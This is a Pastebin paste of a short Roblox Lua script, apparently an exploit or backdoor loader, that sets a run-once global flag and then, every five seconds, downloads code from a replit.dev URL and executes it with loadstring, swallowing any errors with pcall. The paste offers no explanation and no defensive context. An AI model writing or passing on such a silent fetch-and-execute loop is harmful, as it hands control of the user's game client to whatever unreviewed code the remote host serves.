MizuScripts

GDone

Nov 17th, 2025
23
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.29 KB | None | 0 0
  1. if _G.ALREADYDONE then return else _G.ALREADYDONE = true end
  2.  
  3. task.spawn(function()
  4.     while wait(5) do
  5.         pcall(function()
  6.             loadstring(game:HttpGet("https://835c9c82-77fb-4ec0-9185-2a000251fda9-00-152gfijt61k90.spock.replit.dev/get-script", true))()
  7.         end)
  8.     end
  9. end)
Advertisement
Add Comment
Please, Sign In to add comment